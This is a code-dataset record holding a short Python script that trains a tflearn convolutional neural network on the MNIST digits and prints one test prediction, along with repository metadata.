"alpha_fraction": 0.6878353953361511,
"alphanum_fraction": 0.7334526181221008,
"avg_line_length": 38.85714340209961,
"blob_id": "f56f991382fc6957b2ea58ff6ee31e3ab42e0000",
"content_id": "f5863eae4e83de4ea4c23df5daaa80e6fdde9aad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1118,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 28,
"path": "/cnn_mnist_tflearn.py",
"repo_name": "shanmukha-MaiL/CNN",
"src_encoding": "UTF-8",
"text": "import tflearn\nfrom tflearn.layers.conv import conv_2d,max_pool_2d\nfrom tflearn.layers.core import input_data,dropout,fully_connected\nfrom tflearn.layers.estimator import regression\nimport tflearn.datasets.mnist as mnist\nimport numpy as np\n\nx,y,test_x,test_y = mnist.load_data(one_hot=True)\nx = tflearn.reshape(x,[-1,28,28,1])\ntest_x = tflearn.reshape(test_x,[-1,28,28,1])\n\nconv_net = input_data([None,28,28,1],name='input')\n\nconv_net = conv_2d(conv_net,32,5,activation='relu')\nconv_net = max_pool_2d(conv_net,2,2)\nconv_net = conv_2d(conv_net,64,5,activation='relu')\nconv_net = max_pool_2d(conv_net,2,2)\nconv_net = fully_connected(conv_net,1024,activation='relu')\nconv_net = dropout(conv_net,0.8)\nconv_net = fully_connected(conv_net,10,activation='softmax')\nconv_net = regression(conv_net,optimizer='adam',learning_rate=0.01,loss='categorical_crossentropy',name='targets')\nmodel = tflearn.DNN(conv_net)\nmodel.fit({'input':x},{'targets':y},n_epoch=10,validation_set=({'input':test_x},{'targets':test_y}),snapshot_step=500,show_metric=True,run_id='mnist')\n\n\n\nprint(np.round(model.predict(test_x[1])))\nprint(test_y[1])\n\n\n"
}
] | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.